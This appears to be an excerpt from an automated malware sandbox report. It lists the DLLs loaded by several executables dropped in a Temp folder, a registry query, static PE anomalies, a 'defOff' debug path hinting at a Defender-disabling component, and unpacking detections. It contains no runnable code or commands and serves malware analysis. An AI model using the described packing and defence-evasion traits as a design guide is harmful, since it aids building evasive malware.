Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 3296768 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: Raw size of frfapimt is bigger than: 0x100000 < 0x2b9200
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 734386a52c.exe, 0000001E.00000002.3260064307.0000000000AB2000.00000040.00000001.01000000.00000014.sdmp, 734386a52c.exe, 0000001E.00000003.3184731936.00000000048A0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a90000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.1f0000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.1f0000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.1f0000.0.unpack :EW;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;frfapimt:EW;qtisgtef:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Unpacked PE file: 7.2.4611cc433b.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;whvqijov:EW;ikwniflt:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Unpacked PE file: 8.2.79ddad050f.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sbjgrbkb:EW;biqspjfj:EW;.taggant:EW;
